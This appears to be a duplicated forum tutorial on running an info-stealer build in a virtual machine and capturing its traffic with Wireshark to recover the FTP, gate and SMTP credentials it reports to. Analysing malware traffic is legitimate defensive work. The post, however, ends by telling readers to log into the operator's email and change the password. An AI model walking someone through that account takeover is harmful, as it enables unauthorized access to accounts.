13 Years of Service
70%
We will catch the gate/ftp/email, which set the existing build stealer.
We need:
- Build stealer
- Wireshark
- VirtualBox
1. The first thing to do - kill all of the processes that use the network. So it will be easier to find the data you need.
2. Run Wireshark and configure the interface for sniffing: Capture -> Interfaces. Choose the one that you used - in the column will be the largest number of Packets. Click "Start", thereby starting sniffing.
3. Run the build stealer (all on VirtualBox, and nothing else!) and control Process Explorer his work forward to the completion.
4. Go to Wireshark and click Capture -> Stop, that is complete sniffing. We now have a dump of the network activity of the entire system for while working build stealer. It remains to find the desired data.
FTP:
To start trying to detect FTP-server, suddenly stealer in this way sends a report with passwords.
We go to the Wireshark and type into the filter field word "ftp" and press "Enter":
We received the packages sent by FTP:
(In the picture selected host, username and password of FTP)
Gate:
Try to catch the gate address. Remove the "ftp" from the line filter and look for the package follows stealer. Hit Ctrl + F to open the search window. Choosing a search string (Find by: String) and type into the search string "UFR", leave the rest on the default. If the build is to send the password to the gate, something had to be found.
Email:
To do this in the filter field, trying to type the string "smtp" and see this:
Decode username and password from soap sender using this
Go to the email and change the password.
We need:
- Build stealer
- Wireshark
- VirtualBox
1. The first thing to do - kill all of the processes that use the network. So it will be easier to find the data you need.
2. Run Wireshark and configure the interface for sniffing: Capture -> Interfaces. Choose the one that you used - in the column will be the largest number of Packets. Click "Start", thereby starting sniffing.
3. Run the build stealer (all on VirtualBox, and nothing else!) and control Process Explorer his work forward to the completion.
4. Go to Wireshark and click Capture -> Stop, that is complete sniffing. We now have a dump of the network activity of the entire system for while working build stealer. It remains to find the desired data.
FTP:
To start trying to detect FTP-server, suddenly stealer in this way sends a report with passwords.
We go to the Wireshark and type into the filter field word "ftp" and press "Enter":
We received the packages sent by FTP:
(In the picture selected host, username and password of FTP)
Gate:
Try to catch the gate address. Remove the "ftp" from the line filter and look for the package follows stealer. Hit Ctrl + F to open the search window. Choosing a search string (Find by: String) and type into the search string "UFR", leave the rest on the default. If the build is to send the password to the gate, something had to be found.
Email:
To do this in the filter field, trying to type the string "smtp" and see this:
Decode username and password from soap sender using this
This link is hidden for visitors. Please Log in or register now.
Go to the email and change the password.
Last edited by a moderator: